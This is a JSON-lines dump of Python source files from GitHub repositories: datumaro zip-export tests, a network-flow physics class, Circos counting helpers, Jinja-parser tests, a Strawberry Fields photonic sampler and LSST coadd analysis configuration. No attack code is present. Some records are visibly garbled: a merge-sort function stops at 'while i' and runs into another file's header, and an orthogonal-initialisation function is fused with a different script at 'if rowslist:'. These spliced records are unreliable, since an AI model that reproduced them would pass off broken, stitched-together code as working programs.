test_dir:\n coco_dir = osp.join(__file__[:__file__.rfind(osp.join('tests', ''))],\n 'tests', 'assets', 'coco_dataset')\n\n run(self, 'create', '-o', test_dir)\n run(self, 'add', 'path', '-p', test_dir, '-f', 'coco', coco_dir)\n\n export_path = osp.join(test_dir, 'export.zip')\n run(self, 'export', '-p', test_dir, '-f', 'image_zip',\n '-o', test_dir, '--overwrite', '--',\n '--name', osp.basename(export_path))\n\n self.assertTrue(osp.isfile(export_path))\n with ZipFile(export_path, 'r') as zf:\n images = {f.filename for f in zf.filelist}\n self.assertTrue(images == {'a.jpg', 'b.jpg'})\n\n @mark_requirement(Requirements.DATUM_267)\n def test_can_change_extension_for_images_in_zip(self):\n source_dataset = Dataset.from_iterable([\n DatasetItem(id='1', image=np.ones((5, 5, 3))),\n DatasetItem(id='2', image=np.ones((2, 8, 3)))\n ])\n\n with TestDir() as test_dir:\n source_dataset.export(test_dir, format='image_dir', image_ext='.jpg')\n zip_path = osp.join(test_dir, 'images.zip')\n make_zip_archive(test_dir, zip_path)\n\n run(self, 'create', '-o', test_dir)\n run(self, 'add', 'path', '-p', test_dir, '-f', 'image_zip', zip_path)\n\n export_path = osp.join(test_dir, 'export.zip')\n run(self, 'export', '-p', test_dir, '-f', 'image_zip',\n '-o', test_dir, '--overwrite', '--',\n '--name', osp.basename(export_path), '--image-ext', '.png')\n\n self.assertTrue(osp.isfile(export_path))\n with ZipFile(export_path, 'r') as zf:\n images = {f.filename for f in zf.filelist}\n self.assertTrue(images == {'1.png', '2.png'})\n","repo_name":"certiware/posemaro","sub_path":"tests/cli/test_image_zip_format.py","file_name":"test_image_zip_format.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12702915012","text":"\ndef merge(left,right):\n result=[]\n i,j=0,0\n while i\n# @Date: 08-03-2022\n# @Email: felixuwekramer@proton.me\n# @Last modified by: kramer\n# @Last modified time: 08-07-2022\n\n\nimport numpy as np\nimport networkx as nx\nfrom kirchhoff.circuit_init import Circuit\nfrom kirchhoff.circuit_flow import FlowCircuit\nfrom dataclasses import dataclass, field\n\n\n@dataclass\nclass Flow():\n \"\"\"\n The flow class defines variables and methods for computing Hagen-Poiseuille\n flows on kirchhoff networks.\n\n To be used in conjunction with 'kirchhoff' and 'goflow' in order to\n simulate flow-driven network morphogenesis.\n\n Attributes:\n constr (networkx.Graph):\\n\n A networkx graph or circuit to initilize a flow on.\n pars_source (dict):\\n\n The boundary conditions (Neumann) determining the in/outlfow of\n fluid accross the network.\n pars_plexus (dict):\\n\n The initial plexus, edge values of conductivity, the flow is to\n be calculated on.\n\n Methods:\n init_flow():\\n\n Initialize flow variables, boundaries and handle constructor\n exceptions.\n set_boundaries():\\n\n Explicitly set Neumann-boudaries and initial plexus as defined via\n 'pars_source/plexus' parameters. 
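# The merge() fragment above breaks off inside its main loop; a standard
# two-way merge with the same signature reads as follows (reconstruction
# sketch -- the remainder of the original is not shown and may differ):
def merge_sketch(left, right):
    result = []
    i, j = 0, 0
    while i < len(left) and j < len(right):
        if left[i] <= right[j]:
            result.append(left[i])
            i += 1
        else:
            result.append(right[j])
            j += 1
    result.extend(left[i:])   # one of these tails is already empty
    result.extend(right[j:])
    return result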
Set internal output varaibles and\n incidence information.\n find_roots(G):\\n\n Given a networkx graph, return all source-nodes (needs the nodal\n 'source' attribute set).\n find_sinks(G):\\n\n Given a networkx graph, return all sink-nodes (needs the nodal\n 'source' attribute set).\n alpha_omega(G, j):\\n\n Return the start (alpha) and end(omega) node of an edge, for any\n given networkx graph with edge labeling j.\n calc_pressure(conduct, source):\\n\n Compute the pressure landscape, considering the current parameter\n and plexus condition.\n calc_flow_from_pressure(conduct, dP):\\n\n Compute the flow landscape, considering the current parameter\n and plexus condition.\n calc_flow(conduct, source):\\n\n Compute the flow landscape, considering the current parameter\n and plexus condition.\n calc_sq_flow(sconduct, source):\\n\n Compute the squared pressure/flow landscape, considering the\n current parameter and plexus condition.\n calc_cross_section_from_conductivity(conductivity, conductance):\\n\n Compute the squared radii values from the current conductivity\n matrix and conductance value.\n calc_conductivity_from_cross_section(R_sq, conductance):\\n\n Compute the conductivity matrix from the current squared radii\n values and conductance value.\n calc_configuration_flow():\\n\n Compute the pressure/flow landscape, considering the current\n parameter and plexus condition.\n\n \"\"\"\n\n constr: nx.Graph = field(repr=False, init=True)\n pars_source: dict = field(default_factory=dict, repr=False)\n pars_plexus: dict = field(default_factory=dict, repr=False)\n\n def __post_init__(self):\n\n self.init_flow()\n\n def init_flow(self):\n\n \"\"\"\n Initialize flow variables, boundaries and handle constructor\n exceptions.\n\n Raises:\n Exception:\\n\n Warning! Non-networkx type given for initialization, no\n internal circuit established.\n\n \"\"\"\n\n self.info: str = 'unknown'\n\n if isinstance(self.constr, nx.Graph):\n\n self.circuit = FlowCircuit(self.constr)\n\n elif isinstance(self.constr, FlowCircuit):\n\n self.circuit = self.constr\n\n elif isinstance(self.constr, Circuit):\n\n self.circuit = FlowCircuit(self.constr.G)\n\n else:\n raise Exception(\n '''\n Warning! Non-networkx type given for initialization, no\n internal circuit established.\n '''\n )\n\n self.set_boundaries()\n\n def set_boundaries(self):\n\n \"\"\"\n Explicitly set Neumann-boudaries and initial plexus as defined via\n 'pars_source/plexus' parameters. 
Set internal output varaibles and\n incidence information.\n\n \"\"\"\n\n par1 = self.circuit.graph['source_mode']\n par2 = self.circuit.graph['plexus_mode']\n\n if par1 == '' or par2 == '':\n self.circuit.set_source_landscape(**self.pars_source)\n self.circuit.set_plexus_landscape(**self.pars_plexus)\n\n self.info = self.circuit.info\n self.B, self.BT = self.circuit.get_incidence_matrices()\n\n def find_roots(self, G):\n\n \"\"\"\n Given a networkx graph, return all source-nodes (needs the nodal\n 'source' attribute set).\n\n Args:\n G (networkx.Graph):\\n\n A networkx graph.\n\n Returns:\n list:\\n\n A list of root/source nodes of the given graph.\n\n \"\"\"\n\n roots = [n for n in G.nodes() if G.nodes[n]['source'] > 0]\n\n return roots\n\n def find_sinks(self, G):\n \"\"\"\n Given a networkx graph, return all sink-nodes (needs the nodal\n 'source' attribute set).\n\n\n Args:\n G (networkx.Graph):\\n\n A networkx graph.\n\n Returns:\n list:\\n\n A list of outlet/sink nodes of the given graph.\n\n \"\"\"\n\n list_n = self.circuit.list_graph_nodes\n sinks = [n for n in list_n if G.nodes[n]['source'] < 0]\n\n return sinks\n\n def alpha_omega(self, G, j):\n \"\"\"\n Return the start (alpha) and end(omega) node of an edge, for any given\n networkx graph with edge labeling j.\n\n Args:\n G (networkx.Graph):\\n\n A networkx graph.\n j (int):\\n\n An existent edge label.\n\n Returns:\n node: The 'alpha' node of edge (labeld j)\n node: The 'omega' node of edge (labeld j)\n \"\"\"\n\n labels = nx.get_edge_attributes(G, 'label')\n for e, label in labels.items():\n if label == j:\n alpha = e[1]\n omega = e[0]\n\n return alpha, omega\n\n def calc_pressure(self, conduct, source):\n \"\"\"\n Compute the pressure landscape, considering the current parameter\n and plexus condition.\n\n Args:\n conduct (array):\\n\n The network's edge conductivity matrix.\n source (array):\\n\n The nodal source vector.\n\n Returns:\n ndarray: Edge-vector of pressure-differences.\n ndarray: Node-vector of pressures levels.\n\n \"\"\"\n\n OP = np.dot(self.B, np.dot(np.diag(conduct), self.BT))\n P, RES, RG, si = np.linalg.lstsq(OP, source, rcond=None)\n dP = np.dot(self.BT, P)\n\n return dP, P\n\n def calc_flow_from_pressure(self, conduct, dP):\n \"\"\"\n Compute the flow landscape, considering the current parameter\n and plexus condition.\n\n Args:\n conduct (array):\\n\n The network's edge conductivity matrix.\n dP (array):\\n\n Edge-vector of pressure-differences.\n\n Returns:\n ndarray: Edge-vector of directed flow rates.\n \"\"\"\n\n Q = np.dot(np.diag(conduct), dP)\n\n return Q\n\n def calc_flow(self, conduct, source):\n \"\"\"\n Compute the flow landscape, considering the current parameter\n and plexus condition.\n\n Args:\n conduct (array):\\n\n The network's edge conductivity matrix.\n source (array):\\n\n The nodal source vector.\n\n Returns:\n ndarray: Edge-vector of directed flow rates.\n \"\"\"\n\n dP, P = self.calc_pressure(conduct, source)\n Q = np.dot(np.diag(conduct), dP)\n\n return Q\n\n def calc_sq_flow(self, conduct, source):\n \"\"\"\n Compute the squared pressure/flow landscape, considering the current\n parameter and plexus condition.\n\n Args:\n conduct (array):\\n\n The network's edge conductivity matrix.\n source (array):\\n\n The nodal source vector.\n\n Returns:\n ndarray: Edge-vector of squared flow rate values.\n ndarray: Edge-vector of squared pressure difference values.\n \"\"\"\n\n dP, P = self.calc_pressure(conduct, source)\n Q = self.calc_flow_from_pressure(conduct, dP)\n\n p_sq = 
np.multiply(dP, dP)\n q_sq = np.multiply(Q, Q)\n\n return p_sq, q_sq\n\n def calc_cross_section_from_conductivity(self, conductivity, conductance):\n \"\"\"\n Compute the squared radii values from the current conductivity matrix\n and conductance value.\n\n Args:\n conductivity (array):\\n\n The network's edge conductivity matrix.\n conductance (array):\\n\n The graph's conductance unit.\n\n Returns:\n ndarray: Edge-vector of squared radii values.\n \"\"\"\n\n R_sq = np.sqrt(conductivity/conductance)\n\n return R_sq\n\n def calc_conductivity_from_cross_section(self, R_sq, conductance):\n \"\"\"\n Compute the conductivity matrix from the current squared radii values\n and conductance value.\n\n Args:\n R_sq (array):\\n\n Edge-vector of squared radii values.\n conductance (array):\\n\n The graph's conductance unit.\n\n Returns:\n ndarray: The network's edge conductivity matrix.\n \"\"\"\n\n conductivity = np.power(R_sq, 2)*conductance\n\n return conductivity\n\n def calc_configuration_flow(self):\n \"\"\"\n Compute the pressure/flow landscape, considering the current parameter\n and plexus condition.\n\n Returns:\n ndarray: Edge-vector of directed flow rates.\n ndarray: Edge-vector of pressure differences.\n \"\"\"\n\n k = self.circuit.edges['conductivity']\n src = self.circuit.nodes['source']\n\n dP, P = self.calc_pressure(k, src)\n Q = np.dot(np.diag(k), dP)\n\n return Q, dP\n","repo_name":"felixk1990/kirchhoff-hydro","sub_path":"hailhydro/flow_init.py","file_name":"flow_init.py","file_ext":"py","file_size_in_byte":10246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39549690603","text":"from operator import itemgetter\nfrom collections import Counter\nfrom itertools import ifilter, imap, tee\n\n# data for use_subvalues=True should be an iterable with entries of the form:\n# {\n# ltag: (l_sub0, l_sub1, ... l_subn), \n# rtag: (r_sub0, r_sub1, ... r_subm), \n# ... 
\n# } \n\nclass ImageData(object):\n \n def __init__(self, \n data, \n ltag, \n rtag, \n use_subvalues_left=False, \n use_subvalues_right=False, \n **kwargs):\n\n self.data = data\n self.ltag = ltag\n self.rtag = rtag\n\n if kwargs.get('filter'):\n self.data = ifilter(kwargs['filter'], self.data)\n \n # Convert all tags to tuples if only one is a tuple on input.\n if use_subvalues_left and not use_subvalues_right:\n self.data = convert_to_tuples(self.data, self.rtag)\n if use_subvalues_right and not use_subvalues_left:\n self.data = convert_to_tuples(self.data, self.ltag)\n\n self.use_subvalues = (use_subvalues_right or use_subvalues_left)\n self.compute_counts()\n\n def compute_counts(self):\n\n # The use_subvalues flag signifies that our data entries are\n # tuples of primitives, and we want to count the entries in\n # the tuples rather than the tuples themselves.\n if self.use_subvalues:\n \n self.data, copy0, copy1 = tee(self.data, 3)\n l_max, r_max = compute_max_entry_length(copy0, self.ltag, self.rtag)\n\n self.lcounts, self.rcounts, self.pair_counts = \\\n compute_counts_subvalues(copy1, self.ltag, self.rtag, l_max, r_max)\n\n else:\n self.data, copy = tee(self.data, 2)\n\n self.lcounts, self.rcounts, self.pair_counts = \\\n compute_counts_primitives(copy, self.ltag, self.rtag)\n\nclass CMapImageData(object):\n \n def __init__(self, \n data, \n mapping,\n use_subvalues_left=True, # default to true because everything is a tuple\n use_subvalues_right=True, \n use_self_map=False,\n **kwargs):\n\n self.data = data\n self.mapping = mapping\n self.ltag = self.mapping.left_output_key\n self.rtag = self.mapping.right_output_key\n self.use_self_map = use_self_map\n \n self.data = ifilter(lambda x: len(x['Major']) <= 2, mapping.apply(self.data))\n if kwargs.get('filter'):\n self.data = ifilter(kwargs['filter'], self.data)\n\n self.use_subvalues = (use_subvalues_right or use_subvalues_left)\n self.compute_counts()\n\n def __iter__(self):\n data_copy, self.data = tee(self.data, 2)\n return data_copy\n\n def compute_counts(self):\n\n # The use_subvalues flag signifies that our data entries are\n # tuples of primitives, and we want to count the entries in\n # the tuples rather than the tuples themselves.\n\n if self.use_self_map:\n self.data, copy = tee(self.data, 2)\n\n self.lcounts, self.rcounts, self.pair_counts = \\\n compute_counts_self_map(copy, self.ltag, self.rtag) \n\n elif self.use_subvalues:\n \n self.data, copy0, copy1 = tee(self.data, 3)\n l_max, r_max = compute_max_entry_length(copy0, self.ltag, self.rtag)\n\n self.lcounts, self.rcounts, self.pair_counts = \\\n compute_counts_subvalues(copy1, self.ltag, self.rtag, l_max, r_max)\n\n else:\n self.data, copy = tee(self.data, 2)\n\n self.lcounts, self.rcounts, self.pair_counts = \\\n compute_counts_primitives(copy, self.ltag, self.rtag)\n\ndef compute_counts_self_map(data, ltag, rtag):\n \n lvalue_counts = Counter()\n value_pair_counts = Counter()\n\n # Returns a stream of tuples containing (entry[ltag], entry[rtag])\n # for each entry.\n tag_values = imap(itemgetter(ltag, rtag), data)\n for lvalue, rvalue in tag_values:\n\n # if min(lvalue[0], rvalue[0]) == rvalue[0]:\n # tmp = rvalue\n # rvalue = lvalue\n # lvalue = tmp\n \n assert(isinstance(lvalue, tuple)), \"Non-tuple entry: (%s %r)\" % (ltag, lvalue)\n assert(isinstance(rvalue, tuple)), \"Non-tuple: (%s %r)\" % (rtag, rvalue)\n\n lvalue_counts[ lvalue[0] ] += 1\n lvalue_counts[ rvalue[0] ] += 1\n\n value_pair_counts[(lvalue[0], rvalue[0])] += 1\n\n lvalue_total = sum(count for 
count in lvalue_counts.itervalues())\n pair_total = sum(count for count in value_pair_counts.itervalues())\n\n # Convert the counts to ints so that circos can parse them correctly.\n #intify_counts(lvalue_counts)\n #intify_counts(value_pair_counts)\n\n assert(lvalue_total == pair_total*2)\n \n return lvalue_counts, Counter(), value_pair_counts\n\ndef compute_counts_primitives(data, ltag, rtag):\n \n copy0, copy1, copy2 = tee(data, 3)\n\n lvalues = (str(entry[ltag]) for entry in copy0)\n lvalue_counts = Counter(lvalues)\n\n rvalues = (str(entry[rtag]) for entry in copy1)\n rvalue_counts = Counter(rvalues)\n \n # Returns tuples of the form: (entry[ltag], entry[rtag]).\n\n value_pairs = ( (str(entry[ltag]), str(entry[rtag])) for entry in copy2 )\n value_pair_counts = Counter(value_pairs)\n\n lvalue_totals = sum(count for count in lvalue_counts.itervalues())\n rvalue_totals = sum(count for count in rvalue_counts.itervalues())\n pair_totals = sum(count for count in value_pair_counts.itervalues())\n\n assert(lvalue_totals == rvalue_totals == pair_totals)\n\n return lvalue_counts, rvalue_counts, value_pair_counts\n\ndef compute_max_entry_length(data, ltag, rtag):\n\n lval_max = 0\n rval_max = 0\n\n for entry in data:\n\n if len(entry[ltag]) > lval_max:\n lval_max = len(entry[ltag])\n\n if len(entry[rtag]) > rval_max:\n rval_max = len(entry[rtag])\n\n return lval_max, rval_max\n\ndef compute_counts_subvalues(data, ltag, rtag, lval_max, rval_max):\n\n base_units = lval_max * rval_max\n\n lvalue_counts = Counter()\n rvalue_counts = Counter()\n value_pair_counts = Counter()\n\n # Returns a stream of tuples containing (entry[ltag], entry[rtag])\n # for each entry.\n tag_values = imap(itemgetter(ltag, rtag), data)\n for lvalue, rvalue in tag_values:\n \n total_pairs = len(lvalue) * len(rvalue)\n assert(isinstance(lvalue, tuple)), \"Non-tuple entry: (%s %r)\" % (ltag, lvalue)\n assert(isinstance(rvalue, tuple)), \"Non-tuple: (%s %r)\" % (rtag, rvalue)\n \n # Compute counts of distinct l_subvalue. The base unit per entry\n # is spread across each sub-value of lvalue.\n for l_subvalue in lvalue:\n \n lvalue_counts[l_subvalue] += (base_units / (len(lvalue) * 1.0))\n\n # While we're here, compute counts of (lvalue, rvalue)\n # pairs. 
The base unit per entry is spread across all\n # possible pairs of sub-values between lvalue and rvalue.\n for r_subvalue in rvalue:\n value_pair_counts[(l_subvalue, r_subvalue)] += (base_units / (total_pairs * 1.0))\n\n # Compute counts of distinct r_subvalues.\n for r_subvalue in rvalue:\n rvalue_counts[r_subvalue] += (base_units / (len(rvalue) * 1.0))\n\n lvalue_total = sum(count for count in lvalue_counts.itervalues())\n rvalue_total = sum(count for count in rvalue_counts.itervalues())\n pair_total = sum(count for count in rvalue_counts.itervalues())\n\n # Convert the counts to ints so that circos can parse them correctly.\n intify_counts(lvalue_counts)\n intify_counts(rvalue_counts)\n intify_counts(value_pair_counts)\n\n assert(lvalue_total == rvalue_total == pair_total)\n \n return lvalue_counts, rvalue_counts, value_pair_counts\n\ndef intify_counts(counter):\n \n for key in counter.iterkeys():\n counter[key] = int(counter[key])\n\ndef convert_to_tuples(gen, key):\n\n for entry in gen:\n entry[key] = tuple([entry[key]])\n yield entry\n","repo_name":"KaisonTanabe/CircosProject","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22792938163","text":"def removeDuplicates1(nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n i = 0\n length = len(nums)\n while i < length:\n num = nums[i]\n counts = nums.count(num)\n if counts > 1:\n nums2 = nums[i + counts:]\n nums = nums[:i+1]\n nums.extend(nums2)\n length=length-counts+1\n i += 1\n print(nums)\n return len(nums)\n\ndef removeDuplicates(nums):\n #return list(set(listA))\n\n return len(sorted(set(nums), key = nums.index))\n\n\nprint(removeDuplicates([1,1,2,2,5,5,5]))","repo_name":"qq1334713380/leetcode","sub_path":"算法/base/list/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"22781949674","text":"import pytest\nfrom unittest.mock import MagicMock, patch, Mock\nfrom io import StringIO\nfrom contextlib import redirect_stdout\nimport argparse\nfrom argparse import ArgumentParser, FileType\nimport os,sys\nimport yaml\nfrom yaml import FullLoader\n\nj2 = os.path.abspath('.')\nsys.path.insert(1, j2)\nimport j2parser\n\n\nYMLVARS = \"test/template.vars.yml\"\nJSONVARS = \"test/template.vars.json\"\nCMDLINEVARS = [line.lstrip().rstrip() for line in open(\"test/cmdline.vars.list\")]\nENTRYPOINT = [\"command\", \"path/to/config\"]\nTESTARGS = [\n \"\",\n \"-i\",\n \"test/template.vars.yml\",\n \"--var\",\n \"local_docker_path=momo/choko/docker\",\n \"--entrypoint\",\n \"command\",\n \"path/to/config\",\n \"-o\",\n \"manifest.yml\",\n \"test/template.yml\",\n]\n\n\nclass TestJ2parserLoadVars:\n def test_load_vars_1(self):\n result = {}\n result.update(j2parser.load_vars(YMLVARS))\n assert result['local_docker_path'] == 'container/ntrip_docker/Dockerfile'\n return result\n\n def test_load_vars_2(self):\n result = {}\n result.update(j2parser.load_vars(JSONVARS))\n assert result['sidecar_service'] == 'sidecar'\n return result\n\n\n#\nclass TestJ2parserParseCmdlineVars:\n def test_parse_cmdline_vars(self):\n result = {}\n result.update(j2parser.parse_cmdline_vars(CMDLINEVARS))\n assert result['remote_docker_path'] == 'aws_uri'\n return result\n\n\nclass Test_J2parser_Parse_nasty_entrypoint_args:\n def test_parse_nasty_entrypoint_args_1(self):\n result = {}\n 
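# Worked example of the base_units weighting in compute_counts_subvalues
# above (values are illustrative): with lval_max = 2 and rval_max = 3,
# base_units = 6, so an entry whose left tag holds two sub-values and whose
# right tag holds one contributes the same total weight to every counter:
base_units = 2 * 3                                           # lval_max * rval_max
entry = {"L": ("a", "b"), "R": ("x",)}
per_left = base_units / len(entry["L"])                      # 3.0 for "a" and for "b"
per_right = base_units / len(entry["R"])                     # 6.0 for "x"
per_pair = base_units / (len(entry["L"]) * len(entry["R"]))  # 3.0 per (l, r) pair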
result.update(j2parser.parse_nasty_entrypoint_args(ENTRYPOINT))\n assert result == {'entrypoint': ['command', 'path/to/config']}\n return result\n\n\nclass Test_J2parser_Main:\n def test_main_1(self):\n with patch.object(sys, \"argv\", new=TESTARGS):\n f1 = StringIO()\n with redirect_stdout(f1):\n j2parser.main(sys.argv)\n with open('manifest.yml', 'r') as fo:\n generatedfile = {}\n generatedfile = yaml.load(fo, Loader=FullLoader)\n image = str(TESTARGS[4].split(\"=\", 1)[1])\n assert image == generatedfile[\"image\"]['build']\n\n\n","repo_name":"hemzaz/scripts","sub_path":"jinjaparser/test/j2parser_test.py","file_name":"j2parser_test.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34582947305","text":"import numpy as np\r\n\r\nhidden_size = 50 #隐藏层神经元个数\r\nvocab_size = 4 #词汇表大小\r\n\r\ndef init_orthogoanl(param):\r\n '''正交初始化'''\r\n if param.ndim < 2:\r\n raise ValueError('参数维度必须大于2')\r\n rows,cols =param.shape\r\n new_param = np.random.randn(rows,cols)\r\n if rowslist:\n if (i == d):\n self.output_list.append(bits)\n return\n bits.append(0)\n self.generateAllBitStrings(d, bits[:], i + 1)\n \n bits[-1] = 1\n self.generateAllBitStrings(d, bits[:], i + 1)\n\n def get_prob(self):\n self.generateAllBitStrings(self.d, [], 0)\n print(\"\\nprobability of every output mode:\")\n start = time.time()\n for i in self.output_list:\n #prob = results.state.fock_prob(i)\n #print(\"|{}>: {}\".format(\"\".join(str(j) for j in i), prob))\n p_click = np.real_if_close(threshold_detection_prob(self.mu, self.cov, i))\n self.output_prob.append(p_click)\n print(\"|{}>: {}\".format(\"\".join(str(j) for j in i), p_click))\n self.time_cost = time.time()- start\n print(\"Time cost: \"+ str(self.time_cost)+'[s]')\n\n\n\n def record_cov(self):\n data_folder = Path(\"./data/\")\n file = data_folder / \"covMatrix.txt\"\n with open(file, 'w+') as fp:\n for row in self.cov:\n fp.write(' '.join(map(str, row)))\n fp.write('\\n')\n\n filename = \"covMatrix_\"+str(self.d)+\"d.txt\"\n file2 = data_folder / filename\n with open(file2, 'w+') as fp:\n for row in self.cov:\n fp.write(' '.join(map(str, row)))\n fp.write('\\n')\n\n def write_to_csv(self):\n data_folder = Path(\"./data/\")\n file = data_folder / (\"strawberry_\" + str(self.d) +\"d.csv\")\n with open(file, 'w+') as fp:\n fp.write(\"strawberryField\\n\")\n fp.write(\"time cost:,\"+str(self.time_cost)+'[s]\\n')\n fp.write(\"output, probability\\n\")\n for i,row in enumerate(self.output_list):\n fp.write(''.join(str(x) for x in self.output_list[i])+','+\n str(self.output_prob[i])+'\\n')\n\n\n\n\n# Main entry point of the program\nif __name__ == \"__main__\":\n\n # define the linear interferometer\n \n U = np.array([\n [ 0.219546940711-0.256534554457j, 0.611076853957+0.524178937791j, -0.102700187435+0.474478834685j,-0.027250232925+0.03729094623j],\n [ 0.451281863394+0.602582912475j, 0.456952590016+0.01230749109j, 0.131625867435-0.450417744715j, 0.035283194078-0.053244267184j],\n [ 0.038710094355+0.492715562066j,-0.019212744068-0.321842852355j,-0.240776471286+0.524432833034j,-0.458388143039+0.329633367819j],\n [-0.156619083736+0.224568570065j, 0.109992223305-0.163750223027j,-0.421179844245+0.183644837982j, 0.818769184612+0.068015658737j]\n ])\n\n d = 4\n try:\n d=int(sys.argv[1]) \n except:\n print(\"Usage python covMatrix_generator d\\n default interferometer dimension d=4\\n\")\n pass\n \n\n U = random_interferometer(d)\n #print(U)\n #print(\"===================\")\n 
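# The init_orthogoanl fragment above breaks off after the random draw; a
# standard QR-based orthogonal initialiser continuing from those lines would
# read roughly as follows (reconstruction sketch -- the remainder of the
# original is not shown and may differ):
import numpy as np

def init_orthogonal_sketch(param):
    if param.ndim < 2:
        raise ValueError("the parameter must have at least 2 dimensions")
    rows, cols = param.shape
    new_param = np.random.randn(rows, cols)
    if rows < cols:
        new_param = new_param.T       # QR wants rows >= cols for a square Q
    q, r = np.linalg.qr(new_param)
    q *= np.sign(np.diag(r))          # fix the sign ambiguity of the QR step
    if rows < cols:
        q = q.T
    return q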
cov = StrawberrySampler(U)\n #cov.get_prob()\n #cov.write_to_csv()\n\n","repo_name":"9Maxwell6/simuGBS","sub_path":"covMatrix_generator.py","file_name":"covMatrix_generator.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16277260514","text":"import copy\nimport os\nimport astropy.units as u\nimport numpy as np\nimport pandas as pd\nimport functools\n\nfrom collections import defaultdict\n\nfrom lsst.daf.base import DateTime\nfrom lsst.daf.persistence.butler import Butler\nfrom lsst.pex.config import (Config, Field, ConfigField, ListField, DictField, ConfigDictField,\n ConfigurableField)\nfrom lsst.pipe.base import CmdLineTask, ArgumentParser, TaskRunner, TaskError, Struct\nfrom lsst.pipe.drivers.utils import TractDataIdContainer\nfrom lsst.meas.astrom import AstrometryConfig\nfrom lsst.pipe.tasks.parquetTable import MultilevelParquetTable\nfrom lsst.pipe.tasks.colorterms import Colorterm, ColortermLibrary\n\nfrom lsst.meas.algorithms import LoadIndexedReferenceObjectsTask\n\nfrom .analysis import AnalysisConfig, Analysis\nfrom .utils import (Enforcer, MagDiff, MagDiffMatches, MagDiffCompare, AstrometryDiff, AngularDistance,\n TraceSize, PsfTraceSizeDiff, TraceSizeCompare, PercentDiff, E1Resids, E2Resids,\n FootAreaDiffCompare, MagDiffCompareErr,\n CentroidDiff, deconvMom, deconvMomStarGal, concatenateCatalogs, joinMatches,\n matchAndJoinCatalogs, checkPatchOverlap, addColumnsToSchema, addFpPoint,\n addFootprintArea, makeBadArray, addElementIdColumn, addIntFloatOrStrColumn,\n calibrateSourceCatalog, backoutApCorr, matchNanojanskyToAB, fluxToPlotString,\n andCatalog, writeParquet, getRepoInfo, addAliasColumns, addPreComputedColumns,\n computeMeanOfFrac, savePlots, updateVerifyJob, getSchema, loadDenormalizeAndUnpackMatches,\n loadReferencesAndMatchToCatalog, computeAreaDict, getParquetColumnsList)\nfrom .plotUtils import (CosmosLabeller, AllLabeller, StarGalaxyLabeller, OverlapsStarGalaxyLabeller,\n MatchesStarGalaxyLabeller, determineExternalCalLabel, getPlotInfo)\n\nimport lsst.afw.cameraGeom as cameraGeom\nimport lsst.afw.image as afwImage\nimport lsst.afw.table as afwTable\nimport lsst.daf.butler as dafButler\nimport lsst.geom as geom\nimport lsst.verify as verify\n\nnp.seterr(all=\"ignore\")\n\n__all__ = [\"CoaddAnalysisConfig\", \"CoaddAnalysisRunner\", \"CoaddAnalysisTask\", \"CompareCoaddAnalysisConfig\",\n \"CompareCoaddAnalysisRunner\", \"CompareCoaddAnalysisTask\"]\n\nNANOJANSKYS_PER_AB_FLUX = (0*u.ABmag).to_value(u.nJy)\nFLAGCOLORS = [\"yellow\", \"greenyellow\", \"aquamarine\", \"orange\", \"fuchsia\", \"gold\", \"lightseagreen\", \"lime\"]\nfilterToBandMap = {\"HSC-G\": \"g\", \"HSC-R\": \"r\", \"HSC-R2\": \"r\", \"HSC-I\": \"i\", \"HSC-I2\": \"i\",\n \"HSC-Z\": \"z\", \"HSC-Y\": \"y\", \"NB0921\": \"N921\"}\n\n\nclass CoaddAnalysisConfig(Config):\n coaddName = Field(dtype=str, default=\"deep\", doc=\"Name for coadd\")\n matchRadiusRaDec = Field(dtype=float, default=0.5, doc=\"RaDec Matching radius (arcseconds)\")\n matchOverlapRadius = Field(dtype=float, default=0.5, doc=\"Matching radius for overlaps (arcseconds)\")\n matchXy = Field(dtype=bool, default=False, doc=\"Perform matching based on X/Y pixel values?\")\n matchRadiusXy = Field(dtype=float, default=3.0, doc=(\"X/Y Matching radius (pixels): \"\n \"ignored unless matchXy=True\"))\n colorterms = ConfigField(dtype=ColortermLibrary,\n doc=(\"Library of color terms.\"\n \"\\nNote that the colorterms, if any, need to be 
loaded in a config \"\n \"override file. See obs_subaru/config/hsc/coaddAnalysis.py for an \"\n \"example. If the colorterms for the appropriate reference dataset are \"\n \"loaded, they will be applied. Otherwise, no colorterms will be applied \"\n \"to the reference catalog.\"))\n doApplyColorTerms = Field(dtype=bool, default=True, doc=\"Apply colorterms to reference magnitudes?\")\n analysis = ConfigField(dtype=AnalysisConfig, doc=\"Analysis plotting options\")\n analysisAstromMatches = ConfigField(dtype=AnalysisConfig,\n doc=\"Analysis plotting options for astrometric reference matches\")\n analysisPhotomMatches = ConfigField(dtype=AnalysisConfig,\n doc=\"Analysis plotting options for photometric reference matches\")\n matchesMaxDistance = Field(dtype=float, default=0.15, doc=\"Maximum plotting distance for matches\")\n minSrcSignalToNoiseForMatches = Field(dtype=float, default=30, doc=\"Minimum signal to noise level of \"\n \"pipeline catalog sources to be considered when matching to an \"\n \"external reference catalog. Eliminating very low S/N sources \"\n \"before matching is beneficial for speed and avoiding erroneous \"\n \"matches.\")\n externalCatalogs = ConfigDictField(keytype=str, itemtype=AstrometryConfig, default={},\n doc=\"Additional external catalogs for matching\")\n astromRefCat = Field(dtype=str, default=\"gaia\", doc=\"Name of reference catalog for astrometry. \"\n \"Can be either gaia or ps1, in which case the default version will be used, \"\n \"or the full name including the version can be specified \"\n \"(e.g. gaia_dr2_20200414 or ps1_pv3_3pi_20170110)\")\n photomRefCat = Field(dtype=str, default=\"ps1\", doc=\"Name of reference catalog for photometry. \"\n \"Can be ps1, in which case the default version will be used, or the full \"\n \"name including the version can be specified (e.g. ps1_pv3_3pi_20170110)\")\n astromRefObjLoader = ConfigurableField(target=LoadIndexedReferenceObjectsTask,\n 